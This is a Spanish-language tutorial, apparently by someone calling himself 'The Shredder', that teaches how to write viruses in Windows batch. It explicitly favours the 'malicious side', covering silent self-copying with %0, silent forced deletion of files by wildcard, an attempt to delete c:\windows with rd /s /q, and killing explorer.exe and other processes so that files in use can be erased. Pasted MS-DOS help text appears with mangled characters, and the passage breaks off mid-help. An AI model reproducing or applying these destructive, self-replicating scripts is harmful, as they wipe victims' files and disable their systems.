PDF de programación - Tutorial para crear Virus en Batch By The Shredder

***************************************************************
************************The Shredder***************************
***************************************************************

Hola, aqui les presento un tutorial hecho por mi que contiene lo basico para empezar a
intoducirse en la programacion virica en batch....


Lo primero que vamos a aprender, es los comentarios, en batch los comentarios van
despues del simbolo :: , veamos un ejemplo...

::esto no se tomara en cuenta para la ejecucion del codigo...
::solo son comentarios

weno, ahora que ya sabes que son los comentarios, comencemos..


DESACTIVAR EL ECO

En batch, cada comando que esta en el bat es mostrado en pantalla, para desactivar esto,
debes utilizar el comando @echo off. Ejemplo:

echo hola
::si te fijas se mostrara aparte de hola, la instruccion...
pause > nul
::el pause es para pausar la ejecucion del batch hasta que se presione
una tecla...
@echo off
echo hola
:: solo se mostrara hola :)
pause > nul
exit

MANIPULAR ARCHIVOS

Copiar archivos

En Batch para copiar un archivo, se usa el comando copy, y como parametros, primero
el archivo a copiar seguido de espacio y luego la ruta de destino, es importante que las
rutas vayan entre comillas, veamos un ejemplo:

Copy "c:\ruta\de\origen.txt" "e:\ruta\de\destino.bat"

Si te fijas en el ejemplo, nosotros copiamos el archivo origen.txt y lo copiamos a otra
ruta cambandolo a bat, es importante señalar que puedes copiar cualquier tipo de
archivo con este comando...

Como a nosotros nos interesa el lado malicioso, vamos a ver de que modo puede
beneficiar esto a nuestro virus, entonces, el comando copy, puede ir acompañado de /y,
que indica que el archivo de destino, si ya existe, se sobreescribira silenciosamente y sin
confirmacion:


Copy /y "c:\ruta\de\origen.txt" "e:\ruta\de\destino.bat"
::en este caso, si el archivo destino.bat existe, se sobreescribira y
::no pedira ningun tipo de confirmacion.

Bueno, ya sabes copiar archivos, pero, ¿como saber nuestra ruta?,
seguramente estaras pensando en que tu virus se copie a si mismo en
otro directorio, pero para esto deberias saber el nombre de tu virus
junto con su ruta :S, pero, NO TE PREOCUPES! , batch ya nos soluciono
eso :-)...
Para lograr autocopiarnos se debe reemplazar en donde se pone la ruta
de origen por los comandos %0 , eso es el valor de la ruta actual
:-)...

Copy /y %0 "c:\destino.bat"
::esto nos replicara en c:\destino.bat...

AYUDA DE MS-DOS:

Copia uno o m s archivos en otra ubicaci¢nci¢n.

COPY [/V] [/N] [/Y | /-Y] [/Z] [/A | /B ] origen [/A | /B]
[+ origen [/A | /B] [+ ...]] [destino [/A | /B]]

origen Especifica el archivo o archivos que deben copiarse.
/A Indica un archivo de texto ASCII.
/B Indica un archivo binario.
/D Permite al archivo de destino que se cree descifrado
Destino Especifica el directorio y el nombre de archivo de los
nuevos archivos.
/V Verifica que los nuevos archivos se escriben
correctamente.
/N Si es posible, usa un nombre de archivo corto al copiar
un archivo cuyo nombre no tiene el formato 8.3.
/Y Suprime la petici¢n de confirmaci¢n cuando se va a
sobrescribir un archivo destino existente.
/-Y Realiza la petici¢n de confirmaci¢n cuando se va a
sobrescribir un archivo destino existente.
/Z Copia archivos de red en modo reiniciable.

El modificador /Y puede estar preestablecido en la variable de entorno
COPYCMD. Esto puede anularse con el modificador /-Y en la l¡nea de
comando. Est predeterminado el pedir la confirmaci¢n del usuario
antes de sobrescribir, excepto si el comando COPY se ejecuta desde un
archivo de comandos por lotes.

Para anexar archivos, especifique un £nico archivo de destino, pero
varios archivos de origen (usando caracteres comodines o el formato
archivo1+archivo2+archivo3).

Borrar archivos

Uno de los principales comandos para todo malware es borrar archivos,
el comando para realizar esto es Del...se utiliza tipeando Del seguido
de espacio y luego la ruta del archivo a borrar entrecomillas...

Del "c:\archivo a borrar.exe"

Este comando puede borrar cualquier tipo de archivo...si quieres
asegurarte de que el archivo desaparezca, le agregas el parametro /f,
que forzara el borrado...


Del /f "c:\archivo a borrar.exe"

Ahora vamos al lado viral, para que no nos pida confirmacion al
borrar, le agregamos el parametro /q y asi lo borrara de modo
silencioso...

Del /q "c:\a.exe"
::si te fijas borraras el archivo silenciosamente, pero no lo
::forzaras...
Del /f /q "c:\b.txt"
::ahi si se borrara siempre...claro que no debe estar en uso, pero ya
::explicaremos esto mas adelante...


Tambien con este comando, son admitidos los comodines, el comando
asterisco, representa parte del nombre...

del /f /q c:\*woo*
::en la carpeta c:\, borrara todos los archivos que contengan la
palabra woo...
::por ejemplo awoos, swoo, asdasdasdwoo, wooasdasda, etc...
del /f /q c:\*dd
::este borrara solo los archivos que finalizen con dd...
del /f /q c:\*.txt
:: borrara todos los txts...

AYUDA DE MS-DOS:

Elimina uno o más archivos.

DEL [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres
ERASE [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres

nombres Especifica una lista de uno o m s archivos o
directorios.
Se puede utilizar comodines para eliminar varios
archivos.
Si se especifica un directorio todos sus archivos se
eliminar n.


/P Pide confirmaci¢n antes de eliminar cada archivo.
/F Fuerza la eliminaci¢n de archivos de s¢lo lectura.
/S Elimina archivos especificados en todos los
subdirectorios.
/Q Modo silencioso. No pide confirmaci¢n con comod¡n
global
/A Selecciona los archivos que se van a eliminar bas
ndose en los
atributos
atributos R Archivos de s¢lo lectura S Archivos de
sistema
H Archivos ocultos A Archivos
preparados para
almacenamiento
- Prefijo de exclusi¢n

Si las extensiones de comando est n activadas DEL y ERASE cambian de
la siguiente manera:

La semántica que se muestra para el modificador /S est invertida de

tal modo
que le muestra solamente los archivos eliminados y no los que no se
encontraron.

Borrar Carpetas

Otra cosa importante en nuestro virus es borrar carpetas, utilizaremos
entonces el comando rd (remove directory), se utiliza parecido q al
comando del, pero solo utiliza los parametros /s y /q..../s qita todos
los archivos y carpetas del directorio y /q lo hace sin confirmacion y
silenciosamente...

rd "c:\windows"
::uuhhh, q pasaria xDxD
rd /s /q "c:\windows"
::qda mejor no?...= no se borrara, mas adelante explicare porq...

AYUDA DE MS-DOS:

Quita un directorio.

RMDIR [/S] [/Q] [unidad:]ruta
RD [/S] [/Q] [unidad:]ruta

/S Quita todos los directorios y archivos del directorio
además
del mismo directorio. Se utiliza principalmente cuando se
desea quitar un rbol.

/Q Modo silencioso, no pide confirmaci¢n para quitar un rbol
de directorio con /S

Crear directorios

Weno, cuando nuestro virus se quiera copiar a una carpeta, y esta no
existe, se creara un error y no se copiara, para evitar esto, podemos
verificar si el directorio existe que se copie, si no, que cree el
directorio y luego se copie :-)...

El comando para esto es mkdir o md...

mkdir "c:\caca"
md "c:\wooo"
::esto creara ambos directorios, ya q los dos sirven para lo mismo

Comprobar si existe

Para la creacion de nuestro virus, podemos comprobar si existe el
archivo o carpeta que qeramos modificar, borrar, etc....y si existe
nuestra accion sucede...esto se combina con etiqetas, como siempre,
las rutas van entre comillas...

if exist "C:\archivo.exe" (goto 1) else goto 2
:1
::aqi va la accion del virus, notese q el 1 es la etiqeta...
Del /f /q "C:\archivo.exe"
:2
exit

PROCESOS


Matar procesos

para matar procesos se utiliza el comando taskkill, es util siempre
matar procesos, ya q si algun archivo esta en uso, no se puede borrar,
entonces, para esto matamos el proceso del archivo y luego lo borramos
:-)...
el taskkill se utiliza seguido de la expresion /im, y luego el nombre
del ejecutable entre comillas....

taskkill /f /im "explorer.exe"
::esto finalizara el proceso explorer sin pedir confirmacion, gracias
al /f
::supongamos q el archivo hola.exe esta en uso y no lo podemos
borrar...
taskkill /f /im "hola.exe"
Del /f /q "c:\archivos de programas/hola.exe"
::jeje, ya ha desaparecido el archivo hola.exe

AYUDA DE MS-DOS:

TASKKILL [/S sistema] [/U usuario [/P contrase¤a]]
{ [/FI filtro] [/PID IdProceso | /IM NombreImagen] } [/F] [/T]

Descripci¢n:
Esta herramienta de la l¡nea de comandos puede usarse en uno o m s
procesos.
Los procesos pueden terminarse a trav‚s del Id. o del nombre de imagen.

Lista de par metros:
/S sistema Especifica el sistema remoto al que conectarse.

/U [dominio\]usuario Especifica el contexto de usuario en el que se
que el comando debe ejecutarse.

/P contrase¤a Especifica la contrase¤a para el contexto de
usuario dado. Pide la entrada si se omite.

/F Especifica la terminaci¢n forzada
de proceso(s).

/FI filtro Especifica un conjunto de tarea que coinciden
con el criterio especificado en